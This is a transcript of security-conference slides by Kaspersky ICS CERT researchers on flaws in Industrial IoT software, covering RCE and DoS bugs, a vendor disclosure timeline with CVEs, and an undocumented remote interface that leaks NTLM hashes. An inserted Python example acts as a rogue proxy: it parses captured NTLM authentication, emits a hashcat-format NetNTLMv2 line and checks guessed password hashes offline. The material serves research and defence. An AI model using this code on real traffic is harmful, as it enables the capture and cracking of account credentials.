
Post on 25-Jan-2020


TRANSCRIPT


Pwning the Industrial IoT: RCEs and backdoors are around!

Sergey Temnikov, Senior Security Researcher, Critical Infrastructure Defense Team, Kaspersky Lab ICS CERT

Vladimir Dashchenko, Senior Security Researcher, Critical Infrastructure Defense Team, Kaspersky Lab ICS CERT


Who are we?

Penetration testers

Malware analysts

Security auditors

Industrial engineers

Security analysts

Security architects


What’s the IIoT?


What’s the IIoT? In simple words:

Fancy concept/solution

Old security problems

IIoT


Vulnerabilities

[Bar chart: vulnerabilities found, by class. Categories: RCE, DoS, Injections, File manipulations, Account manipulations.]


Vulnerability research approach

• Custom protocols

• DCOM

• OPC UA


Vuln1. XML :(

Custom XML parser allows easy trace



Vuln2. OPC UA :(

DoS and possible RCE


Vuln3. Custom protocol

Not only ICS. It’s huge


Vuln3. Custom protocol: disclosure timeline

Reported in Dec 2016 (2 RCE; 11 DoS)

Reminder sent at the end of Dec 2016

Report sent again in Jan 2017

6 months of nothing

Vendor silently pushes the driver update

Not installed with MS updates

Waited for CVEs (spoiler: no luck)

Notified US ICS-CERT about the potential threat

“Hey! We gonna talk about this at DEFCON” email -> private alert sent -> confcall with VP/CTO

Public advisory published with CVEs assigned (CVE-2017-11496, CVE-2017-11497, CVE-2017-11498)

BUT THERE’S MORE


Strange thing same vendor


Strange thing same vendor

Looks like BEAR

Smells like BEAR

Acts like BEAR

Tastes like BEAR

What’s that?

NOT-A-BEAR


Strange thing, same vendor

Remotely enable and disable the admin panel (undocumented). Panel available on 127.0.0.1

Remotely change the proxy server used for updates

Got the NTLM hash of the user who runs the process

Still under research (got new RCEs; logical RCE?)
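The slide pairs a remotely changeable update proxy with "got the NTLM hash of the user who runs the process" but does not spell out the mechanism. The natural reading, assumed here, is that the update client performs NTLM authentication to whatever proxy it is pointed at, so whoever controls that proxy receives a NetNTLMv2 challenge/response for the service account and can attack it offline. The following is an added example, not the researchers' or the vendor's code, of what such a rogue proxy does with the captured Proxy-Authorization header: parse the NTLMSSP Type 3 (AUTHENTICATE_MESSAGE), emit it in hashcat's -m 5600 format, and check a candidate NT hash against it. The user, domain, workstation, challenge and NT hash values are constructed; the MD4 step from a password to an NT hash is left out.

```python
"""Constructed example: what a rogue HTTP proxy learns from an NTLM-authenticating client.
Parses the NTLMSSP Type 3 message from a Proxy-Authorization header, prints a NetNTLMv2
line for hashcat -m 5600, and verifies a candidate NT hash against it (MS-NLMP 3.3.2)."""
import base64
import hashlib
import hmac
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_AUTHENTICATE = 3
NEGOTIATE_UNICODE = 0x00000001

# Constructed sample values (not real credentials or a real capture).
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")                 # 8-byte Type 2 challenge
SAMPLE_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")   # would be MD4(UTF-16LE(pw))

def _field(msg: bytes, at: int) -> bytes:
    """Read an NTLM payload descriptor (Len, MaxLen, BufferOffset) at `at` and return the
    bytes it references; bounds-checked so a hostile message cannot over-read."""
    length, _max_len, offset = struct.unpack_from("<HHI", msg, at)
    if offset + length > len(msg):
        raise ValueError("NTLM field descriptor points outside the message")
    return msg[offset:offset + length]

def parse_ntlm_type3(msg: bytes) -> dict:
    """Split a Type 3 message into its fields; offsets follow MS-NLMP 2.2.1.3."""
    if len(msg) < 64 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    if struct.unpack_from("<I", msg, 8)[0] != NTLMSSP_AUTHENTICATE:
        raise ValueError("not an AUTHENTICATE_MESSAGE (Type 3)")
    flags = struct.unpack_from("<I", msg, 60)[0]
    # Strings are UTF-16LE when NEGOTIATE_UNICODE is set; otherwise the OEM codepage is
    # host-dependent, cp437 is assumed here.
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"
    nt_response = _field(msg, 20)
    return {
        "lm_response": _field(msg, 12),
        "domain": _field(msg, 28).decode(enc),
        "user": _field(msg, 36).decode(enc),
        "workstation": _field(msg, 44).decode(enc),
        "flags": flags,
        # NTLMv2: the first 16 bytes are NTProofStr, the remainder is the client blob
        "ntproofstr": nt_response[:16],
        "blob": nt_response[16:],
    }

def from_proxy_authorization(header_value: str) -> bytes:
    """'Proxy-Authorization: NTLM <base64>' -> raw NTLMSSP bytes."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("not an NTLM Proxy-Authorization header")
    return base64.b64decode(token)

def hashcat_line(parsed: dict, server_challenge: bytes) -> str:
    """NetNTLMv2 in hashcat -m 5600 form: USER::DOMAIN:challenge:NTProofStr:blob."""
    return "{}::{}:{}:{}:{}".format(parsed["user"], parsed["domain"], server_challenge.hex(),
                                    parsed["ntproofstr"].hex(), parsed["blob"].hex())

def ntlmv2_proof(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob), with
    NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) || domain))."""
    ntowf_v2 = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()

def check_candidate_nt_hash(parsed: dict, server_challenge: bytes, nt_hash: bytes) -> bool:
    """The offline 'crack' step: a guessed NT hash is right iff it reproduces NTProofStr."""
    proof = ntlmv2_proof(nt_hash, parsed["user"], parsed["domain"], server_challenge, parsed["blob"])
    return hmac.compare_digest(proof, parsed["ntproofstr"])

def build_sample_type3(user: str, domain: str, workstation: str, nt_response: bytes) -> bytes:
    """Assemble a Type 3 message as a client would (no Version/MIC, so payload starts at 64).
    Used only to create the constructed capture below."""
    enc = "utf-16-le"
    parts = [b"\x00" * 24, nt_response, domain.encode(enc), user.encode(enc),
             workstation.encode(enc), b""]  # LM, NT, domain, user, workstation, session key
    descriptors, offset = b"", 64
    for part in parts:
        descriptors += struct.pack("<HHI", len(part), len(part), offset)
        offset += len(part)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", NTLMSSP_AUTHENTICATE) + descriptors
            + struct.pack("<I", NEGOTIATE_UNICODE | 0x00000200) + b"".join(parts))

def sample_header() -> str:
    """A constructed Proxy-Authorization header from user 'svc_update' in domain 'CORP'."""
    # NTLMv2 client blob: version 0x0101, reserved, timestamp, client nonce, reserved,
    # (empty) target info, reserved. Timestamp and nonce are fixed for reproducibility.
    blob = bytes.fromhex("0101000000000000") + b"\x00" * 8 + b"\x11" * 8 + b"\x00" * 8
    proof = ntlmv2_proof(SAMPLE_NT_HASH, "svc_update", "CORP", SERVER_CHALLENGE, blob)
    return "NTLM " + base64.b64encode(build_sample_type3("svc_update", "CORP", "HMI01", proof + blob)).decode("ascii")

if __name__ == "__main__":
    captured = parse_ntlm_type3(from_proxy_authorization(sample_header()))
    print(hashcat_line(captured, SERVER_CHALLENGE))
```

The point for defenders is the last function: once the response has left the host, nothing on the host can revoke it; the only question is how long the service account's password resists a dictionary run. A proxy setting that a remote, undocumented interface can rewrite therefore turns a software-update feature into a credential-capture primitive, which is why the talk treats it as backdoor-like rather than as a mere misconfiguration.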


Conclusion and advice

Share the knowledge

Stand corrected

If you want to do Industry 4.0, IIoT and blah-blah-blah – do it right and secure

Third-party software should be tested properly


THANK YOU!

Sergey Temnikov (Sergey.Temnikov2@kaspersky.com)

Vladimir Dashchenko (Vladimir.Dashchenko@Kaspersky.com)
